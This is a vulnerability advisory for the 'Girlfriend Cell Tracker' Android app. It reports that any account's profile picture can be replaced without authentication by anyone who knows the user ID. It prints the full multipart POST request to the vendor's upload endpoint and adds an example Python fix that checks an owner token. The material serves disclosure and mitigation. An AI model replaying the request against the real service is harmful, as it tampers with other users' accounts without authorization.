SIK-2017-051


Title:

Profile picture of any account can be changed without authorization in Girlfriend Cell Tracker App

Report ID

SIK-2017-051

Summary:

  • Vendor: SoftSquare InfoSoft
  • Product: Girlfriend Cell Tracker (Package-Name: com.omrup.cell.tracker)
  • Affected Version: v1.20
  • Severity: Low
  • Short summary: Knowing only the user ID (which can be leaked via SIK-2017-047), the profile picture of that account can be changed.

Details:

By sending the following POST request

POST /****/api/upload_file.php HTTP/1.1
Content-Type: multipart/form-data; boundary=77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Length: 16468
Host: omsquare.in
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.4.0

--77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Disposition: form-data; name="file"; filename="cropped1506604715.jpg"
Content-Type: text/csv
Content-Length: 16134

[PICTURE DATA IN BINARY]

--77a6d0f9-460d-42f4-8dc2-79280f16c0f2
Content-Disposition: form-data; name="id"
Content-Length: 15

149865712068829   [USER ID TO CHANGE PROFILE PICTURE FOR]
--77a6d0f9-460d-42f4-8dc2-79280f16c0f2--

a profile picture can be uploaded, and it is set as the profile picture of the account with the given user ID.

All User-IDs can be extracted via SIK-2017-047.

Workaround

None.

Suggested Mitigation

Require authentication when uploading profile pictures.
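One way to apply this mitigation, shown as an added example that is neither the vendor's code nor part of the original advisory: the first handler behaves as described under Details, the second accepts the upload only from the authenticated owner of the id. The HMAC token scheme, the function names and the user ids are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed server-side state for this example (not taken from the app).
SERVER_KEY = secrets.token_bytes(32)
PROFILE_PICS = {}  # user id -> stored picture bytes

def issue_token(user_id: str) -> str:
    """Handed to a user at login: '<user id>.<HMAC-SHA256 over the user id>'."""
    mac = hmac.new(SERVER_KEY, user_id.encode(), hashlib.sha256).hexdigest()
    return f"{user_id}.{mac}"

def authenticated_user(token):
    """Return the user id the token was issued for, or None if it is invalid."""
    user_id, _, mac = (token or "").rpartition(".")
    expected = hmac.new(SERVER_KEY, user_id.encode(), hashlib.sha256).hexdigest()
    ok = bool(user_id) and hmac.compare_digest(mac.encode(), expected.encode())
    return user_id if ok else None

def upload_unauthenticated(form: dict) -> int:
    """Behaviour described in the advisory: the 'id' field alone selects the account."""
    PROFILE_PICS[form["id"]] = form["file"]
    return 200

def upload_authenticated(form: dict, token) -> int:
    """Mitigated handler: the caller must prove which account it is."""
    user_id = authenticated_user(token)
    if user_id is None:
        return 401  # no valid credential presented
    if form.get("id") != user_id:
        return 403  # authenticated, but not the owner of 'id'
    PROFILE_PICS[user_id] = form["file"]
    return 200

if __name__ == "__main__":
    # Constructed ids: "1001" is the account being changed, "1002" is another user.
    other = issue_token("1002")
    print(upload_unauthenticated({"id": "1001", "file": b"img"}))     # accepted
    print(upload_authenticated({"id": "1001", "file": b"img"}, None))  # rejected
    print(upload_authenticated({"id": "1001", "file": b"img"}, other)) # rejected
    print(upload_authenticated({"id": "1002", "file": b"img"}, other)) # accepted
```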

Timeline

  • 2017-08-23: Vulnerability discovered
  • 2017-08-29: First Email sent to developer
  • 2018-08-11: Published